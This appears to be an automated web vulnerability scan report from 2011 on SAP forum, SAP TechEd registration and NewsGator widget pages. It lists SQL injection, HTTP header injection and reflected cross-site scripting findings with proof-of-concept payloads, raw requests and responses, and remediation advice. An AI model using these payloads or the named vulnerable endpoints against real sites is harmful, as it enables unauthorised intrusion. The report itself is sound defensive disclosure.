SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The error parameter appears to be vulnerable to SQL injection attacks. The payloads 15267202%20or%201%3d1--%20 and 15267202%20or%201%3d2--%20 were each submitted in the error parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<img src="pics/Error.gif" border="0" align="absmiddle"> Your form is incomplete. Please enter or correct the information in the fields below. <br /><br /> No e-mail address was supplied.No @ sign detected. An @ sign is part of every e-mail address.An @ sign cannot be the last character of the e-mail address.An @ sign cannot be the first character of the e-mail address.A valid e-mail address contains only one @ sign.No period detected. An e-mail address contains at least one period.The last character of the e-mail address cannot be a period.The first character of the e-mail address cannot be a period.A valid e-mail address cannot contain a comma. If you have a Compuserve account, substitute a period for the comma in your Compuserve ID, like so: <B>12345.6789@compuserve.com</B>.You cannot have a space as part of a single e-mail address.You cannot have an asterisk in an e-mail address.You cannot have a close parenthesis sign in an e-mail address.You cannot have an open parenthesis sign in an e-mail address.You cannot have a greater than sign in an e-mail address.You cannot have a less than sign in an e-mail address.You cannot have a colon in an e-mail address.You cannot have a semicolon in an e-mail address.You cannot have a double quote in an e-mail address.The person you are trying to invite is already in the Registration System.You must provide a last name.Please look for the checks below.We could not find a registration record with the confirmation number you entered.An e-mail to reset your password has been sent!You do not have access to this record!The record you are trying to access is still incomplete, please click on the Registration link and login to access your recor ...[SNIP]...
<td colspan="4" class="field-label" align="Left" valign="Top" width="700" style="padding-top:3px;padding-bottom:3px;"> <script type="text/javascript"> function displayQuestion(id1) { var browserName=navigator.appName; if (browserName=="Netscape") { document.getElementById(id1).style.display = 'table-row-group'; } else { document.getElementById(id1).style.display = 'inline'; } } function hideQuestion(id1) { document.getElementById(id1).style.display = 'none'; }
function displayHide(id1,id2) { if (document.RegForm.sTandC.checked) displayQuestion(id1) else hideQuestion(id1) } </script>
<p><strong>SAP TechEd Registrant Terms and Conditions</strong></p><p>This registration and your attendance at SAP TechEd is subject to the "<a href="javascript:newwindow('index.cfm?fuseaction=reg.TermsAndConditions&bHeader ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16635132'%20or%201%3d1--%20 and 16635132'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<script type="text/javascript" language="javascript"> try { // Match http or https var pattern = /^https?:\/\/(www(\d{3})?|wwwn|admin|webservice)\.sdn\.sap\.com/;
if (!pattern.test(parent.location.href)) { // preserve current protocol, whether http or https
parent.location.replace(document.location.protocol+'//www.sdn.sap.com/irj/scn/weblogs?blog=' + escape(document.location.pathname) + escape(document.location.search)); } } catch (e) { } </script> <noscript><!-- script for frames and spidering --></noscript>
The value of the d request parameter is copied into the Location response header. The payload 57e50%0d%0a7cb60e2cdc6 was submitted in the d parameter. This caused a response containing an injected HTTP header.
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://reservoir.marketstudio.net/57e50 7cb60e ...[SNIP]...
3. Cross-site scripting (reflected)
There are 139 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a68f<script>alert(1)</script>2f938d81d11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f743b<script>alert(1)</script>1d42a6eebdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d7944<script>alert(1)</script>23ec30e32fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a2415<script>alert(1)</script>4d9ac83b755 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 117e1<script>alert(1)</script>973b6f008cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c1bb<script>alert(1)</script>a2aabb6bf4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60bc8<script>alert(1)</script>bf2497c4639 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ebf5<script>alert(1)</script>6d25fbe996 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 142c9<script>alert(1)</script>9524fe82742 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c97fa<script>alert(1)</script>efe729d14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d7ad<script>alert(1)</script>af916879b70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5f4a<script>alert(1)</script>145318725a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 95f6f<script>alert(1)</script>da42c3dd6dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 664f2<script>alert(1)</script>a81d0f7539a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f16e8<script>alert(1)</script>8de76daedec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78724<script>alert(1)</script>6627191e19f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9726b<script>alert(1)</script>f1d958d7d40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c11ea<script>alert(1)</script>3d8d2c650a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d00b2<script>alert(1)</script>2a60a99c87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 813b4<script>alert(1)</script>b80a639f654 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13b92<script>alert(1)</script>2192398d55f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a1b69(a)5c9dcb45dbc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 97de3(a)c7cf365f0d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3df4c<script>alert(1)</script>54d7771a769 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 39fa5<script>alert(1)</script>b22cba590c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the forumID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fdeb</script><a>7cc8d3868a3 was submitted in the forumID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOEUwRjEtRjQxNjEwNzEyOTNDN0QyNw== Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 9049 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:25:11 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: Not Fou ...[SNIP]... "..." s.prop5="glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/forum.jspa?forumID=2099fdeb</script><a>7cc8d3868a3&start=0"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
3.27. http://forums.sdn.sap.com/forum.jspa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://forums.sdn.sap.com
Path: /forum.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72910"><a>80712adb491 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOTExOEUtODNFQTcyRDhDMjRBMjYzNg== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 209 SDN_CATEGORY: 6 Content-Length: 45770 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:25:23 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: SAP Tec ...[SNIP]... <link rel="stylesheet" type="text/css" href="/style/style.jsp?72910"><a>80712adb491=1&forumID=209&start=0" /> ...[SNIP]...
3.28. http://forums.sdn.sap.com/forum.jspa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://forums.sdn.sap.com
Path: /forum.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e249</script><a>03d13503ced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the start request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da61d</script><a>3343eb56bb4 was submitted in the start parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOEYwNjctMUI4NjBFNTdCRjdFMjFB Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 9036 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:25:14 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: </title ...[SNIP]... s.prop5="glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/forum.jspa?forumID=209&start=0da61d</script><a>3343eb56bb4"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
3.30. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://forums.sdn.sap.com
Path: /thread.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf476</script><a>2f82619d2da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOUU2RkMtNjhDNzA2NDFGQTJFMDE3NQ== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 209 SDN_CATEGORY: 6 SDN_THREAD: 2059162 SDN_MESSAGE: 10731664 Content-Length: 22343 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:26:18 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: SAP SEC ...[SNIP]... "glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=2059162&tstart=0&bf476</script><a>2f82619d2da=1"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
3.31. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://forums.sdn.sap.com
Path:
/thread.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4ddf"><a>ec5e2e237d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6703c</script><a>08b4367be6b was submitted in the threadID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the tstart request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b4c8</script><a>b798772e4f3 was submitted in the tstart parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload 3aa10<script>alert(1)</script>92b285fbac7 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NGBuzz/buzz.ashx?load=data&apiToken=8A9F478544194B85AC55E891BBE40862&buzzId=215423&_dsrId=ngbuzz_215423_data3aa10<script>alert(1)</script>92b285fbac7 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Sat, 15 Oct 2011 13:56:52 GMT
ETag: 634542838121454462
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 3034
Cache-Control: public, max-age=300
Date: Sat, 15 Oct 2011 14:24:41 GMT
Connection: close
window.ng_scriptload({id:'ngbuzz_215423_data3aa10<script>alert(1)</script>92b285fbac7',status:200,statusText:'200 OK',response:{Data:[{PostId:21062774210,PubDate:new Date(1318646580000),FeedName:'SAP Developer Network SAP Weblogs: SAP TechEd',Title:'Tune in to SAP TechEd Live!',HtmlUrl ...[SNIP]...
The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload c4314<script>alert(1)</script>7157f909e78 was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NGBuzz/buzz.ashx?buzzId=215423c4314<script>alert(1)</script>7157f909e78&apiToken=8A9F478544194B85AC55E891BBE40862 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 102
Cache-Control: private, max-age=600
Date: Sat, 15 Oct 2011 14:24:29 GMT
Connection: close
X-N: S
//An error occurred: Could not find Buzz item with id: 215423c4314<script>alert(1)</script>7157f909e78
3.36. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://nmp.newsgator.com
Path:
/NGBuzz/buzz.ashx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 64204%3balert(1)//95fd43ea14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64204;alert(1)//95fd43ea14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NGBuzz/buzz.ashx?buzzId=215423&apiToken=8A9F478544194B85AC55E891BBE40862&64204%3balert(1)//95fd43ea14=1 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Fri, 07 Oct 2011 20:13:12 GMT
ETag: 634536151927656250
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 3794
Cache-Control: public, max-age=600
Date: Sat, 15 Oct 2011 14:24:30 GMT
Connection: close
try{var buzzTemplate_215423="\t{stringify CustomFooter}\n\t\t<div class=\"footerClass\">\n\t\t\t<!--- Style up your footer --->\n\t\t\t<a style=\"cursor: pointer;\" href=\"javascript:void(0)\" onclick ...[SNIP]...
var s = function(){ try{ if(typeof ng != "undefined" && typeof ng.buzz != "undefined" && ng.buzz.Buzzlet){ var b = new ng.buzz.Buzzlet({apiToken:'8A9F478544194B85AC55E891BBE40862',extraArgs:{64204;alert(1)//95fd43ea14:'1'},templateId:'buzzTemplate_215423',name:'_Events - SAP TechEd V2',buzzId:215423,targetId:null,orgCode:'6679',buzzTracking:{parentTrackingId:null,myTrackingId:null},scriptCtx:'window',analytics:{ngA ...[SNIP]...
